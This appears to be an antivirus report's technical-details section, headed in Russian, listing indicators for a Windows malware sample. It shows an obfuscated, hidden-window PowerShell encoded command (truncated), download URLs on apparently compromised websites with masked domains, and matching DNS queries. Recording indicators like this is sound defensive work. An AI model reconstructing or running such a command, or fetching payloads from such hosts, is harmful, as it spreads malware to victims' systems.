Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAHcAZQBnAGgAdABoAD0AKAAnAEYAJwArACgAJwBjAGwAJwArACcAMAAnACkAKwAoACcAXwAnACsAJwBiAGoAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAG4AdgA6AFQARQBtAHAAXABXAG8AcgBkAFwAMgAwAD...
- http://ze####energy.com/wp-admin/E/
- http://vi###amv1.com/wp-admin/W/
- http://www.mj####tbased.com/cgi-bin/ht/
- http://ta###akeup.com/myclassapp/Rt/
- http://uc########snagpurandchattisgarh.com/App/JVO/
- DNS ASK ze####energy.com
- DNS ASK vi###amv1.com
- DNS ASK tu##cip.com
- DNS ASK mj####tbased.com
- DNS ASK ta###akeup.com
- DNS ASK uc########snagpurandchattisgarh.com
- DNS ASK ga#####amapersada.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAHcAZQBnAGgAdABoAD0AKAAnAEYAJwArACgAJwBjAGwAJwArACcAMAAnACkAKwAoACcAXwAnACsAJwBiAGoAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAG4AdgA6AFQARQBtAHAAXABXAG8AcgBkAFwAMgAwAD...' (со скрытым окном)